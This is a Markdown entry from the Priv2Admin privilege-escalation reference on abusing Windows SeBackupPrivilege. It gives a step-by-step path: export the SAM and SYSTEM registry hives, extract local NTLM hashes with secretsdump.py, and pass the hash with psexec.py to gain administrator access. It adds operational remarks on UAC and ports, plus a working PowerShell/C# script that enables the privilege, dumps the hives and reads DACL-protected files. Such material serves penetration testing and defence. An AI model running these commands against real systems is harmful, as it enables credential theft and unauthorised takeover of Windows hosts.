Priv2Admin/SeBackupPrivilege.md

| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeBackup | **Admin**<br><br>Sensitive files access (in combination with SeRestore) | 3rd party tool<br><br>Built-in commands | 1. Make sure SeBackupPrivilege is present in the process token and enable it (privileges are disabled by default; `reg.exe` and `robocopy` enable it themselves, a custom tool must call `AdjustTokenPrivileges`)<br><br>2. Export the `HKLM\SAM` and `HKLM\SYSTEM` registry hives:<br>`cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"`<br><br>3. If the next steps are not run on the target, transfer the exported hives to an attacker-controlled computer<br><br>4. Extract the local accounts hashes from the exported SAM hive (the SYSTEM hive holds the boot key needed to decrypt it), for example with Impacket's secretsdump.py:<br>`secretsdump.py -sam SAM -system SYSTEM LOCAL`<br><br>5. Authenticate as the built-in Administrator, or another member of the local Administrators group, using its NTLM hash (Pass-the-Hash), for example with Impacket's psexec.py:<br>`psexec.py -hashes ":<ADMINISTRATOR_NTLM>" <LOCAL_ADMIN_USERNAME>@<TARGET_IP>`<br><br>Alternatively, the privilege can be used to read sensitive files with `robocopy /b` | - User Account Control remote restrictions (`LocalAccountTokenFilterPolicy`, disabled by default) block Pass-the-Hash network logons of local accounts, but the built-in Administrator (RID 500) is exempt as long as `FilterAdministratorToken` is disabled, which is the default.<br><br>- Pass-the-Hash can be attempted over (at least) the following services: SMB (TCP 445), SMB over NetBIOS (TCP 139), WinRM (TCP 5985 / 5986), or RDP (TCP 3389) if Restricted Admin mode is enabled server side.<br><br>- UAC also filters the interactive logon tokens of Backup Operators members, and the filtered token has no SeBackupPrivilege. Run from an unfiltered token (an elevated prompt, or a WinRM session) and check with `whoami /priv` that SeBackupPrivilege is listed; the state `Disabled` is fine, only presence matters.<br><br>- Access to sensitive files may be more interesting if `%WINDIR%\MEMORY.DMP` is readable: a complete memory dump includes the memory of every process, LSASS included.<br><br>- SeBackupPrivilege only grants read access (backup semantics) that bypasses the file DACL; writing requires SeRestorePrivilege, and files held open exclusively, such as the live hive files under `%WINDIR%\System32\config`, still cannot be read, which is why the hives are exported with `reg save`.<br><br>- Robocopy requires both SeBackup and SeRestore to work with the `/b` parameter (members of the Backup Operators group hold both by default). With only SeBackup in the token, Copy-FileSeBackupPrivilege from the SeBackupPrivilege PowerShell module can be used instead:<br>`Import-Module .\SeBackupPrivilegeUtils.dll`<br>`Import-Module .\SeBackupPrivilegeCmdLets.dll`<br>`Set-SeBackupPrivilege`<br>`Copy-FileSeBackupPrivilege <SOURCE_FILE> <DEST_FILE>` |
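As an added example (not part of Priv2Admin nor of the SeBackupPrivilege module), the following PowerShell script does what the execution path above and the Copy-FileSeBackupPrivilege alternative rely on: it enables SeBackupPrivilege in the current token through `AdjustTokenPrivileges`, checks that the privilege was actually held, exports the two hives with `reg save`, and copies one DACL-protected file by opening it with `FILE_FLAG_BACKUP_SEMANTICS`, which is the backup-read path that bypasses the ACL check. The class name `BackupPriv`, the source path `C:\Users\Administrator\Desktop\secret.txt` and the use of `$env:TEMP` as output directory are the example's own assumptions.

```powershell
# Added example: enable SeBackupPrivilege and read a DACL-protected file with backup semantics.
$code = @'
using System;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class BackupPriv   // example class name, not from any existing tool
{
    [StructLayout(LayoutKind.Sequential)]
    struct LUID { public uint LowPart; public int HighPart; }

    // TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES entry
    [StructLayout(LayoutKind.Sequential)]
    struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    const uint TOKEN_ADJUST_PRIVILEGES = 0x0020, TOKEN_QUERY = 0x0008, SE_PRIVILEGE_ENABLED = 0x2;
    const uint GENERIC_READ = 0x80000000, FILE_SHARE_ALL = 0x7, OPEN_EXISTING = 3;
    const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;
    const int ERROR_SUCCESS = 0;   // AdjustTokenPrivileges sets ERROR_NOT_ALL_ASSIGNED (1300) if the privilege is not held

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES np,
                                             uint len, IntPtr prev, IntPtr ret);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string path, uint access, uint share, IntPtr sa,
                                            uint disp, uint flags, IntPtr tmpl);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();

    // Returns true only if the privilege is present in the token AND is now enabled.
    public static bool Enable(string priv)
    {
        IntPtr tok;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out tok)) return false;
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        tp.Attributes = SE_PRIVILEGE_ENABLED;
        if (!LookupPrivilegeValue(null, priv, out tp.Luid)) return false;
        bool ok = AdjustTokenPrivileges(tok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
        // The call returns TRUE even when nothing was assigned, so the last error must be checked too.
        return ok && Marshal.GetLastWin32Error() == ERROR_SUCCESS;
    }

    // Open the source with FILE_FLAG_BACKUP_SEMANTICS: with SeBackupPrivilege enabled the DACL is bypassed.
    // Files opened exclusively by another process (live registry hives) still fail with a sharing violation.
    public static long CopyWithBackupSemantics(string src, string dst)
    {
        SafeFileHandle h = CreateFile(src, GENERIC_READ, FILE_SHARE_ALL, IntPtr.Zero,
                                      OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
        if (h.IsInvalid) throw new IOException("CreateFile failed, Win32 error " + Marshal.GetLastWin32Error());
        using (FileStream fin = new FileStream(h, FileAccess.Read))
        using (FileStream fout = File.Create(dst))
        {
            fin.CopyTo(fout);
            return fout.Length;
        }
    }
}
'@
Add-Type -TypeDefinition $code

# Step 1: the privilege must be present (state "Disabled" is fine). An interactive Backup Operators
# logon under UAC gets a filtered token without it; a WinRM session or an elevated prompt keeps it.
whoami /priv | Select-String 'SeBackupPrivilege'
if (-not [BackupPriv]::Enable('SeBackupPrivilege')) {
    throw 'SeBackupPrivilege is not held by this token (filtered token or wrong group?)'
}

# Step 2: hive export. reg.exe enables the privilege on its own; done here after Enable for clarity.
reg save HKLM\SAM   "$env:TEMP\SAM"    /y
reg save HKLM\SYSTEM "$env:TEMP\SYSTEM" /y

# Alternative to robocopy /b: copy one DACL-protected file using only SeBackupPrivilege
# (assumed example path; any file whose ACL denies the current user will do).
$bytes = [BackupPriv]::CopyWithBackupSemantics('C:\Users\Administrator\Desktop\secret.txt', "$env:TEMP\secret.txt")
"Copied $bytes bytes with backup semantics"
```

The `Enable` check matters in practice: `AdjustTokenPrivileges` returns success for a privilege the token does not hold and only signals it through `ERROR_NOT_ALL_ASSIGNED`, so a script that ignores the last error will report the privilege as enabled and then fail with access denied on the file open.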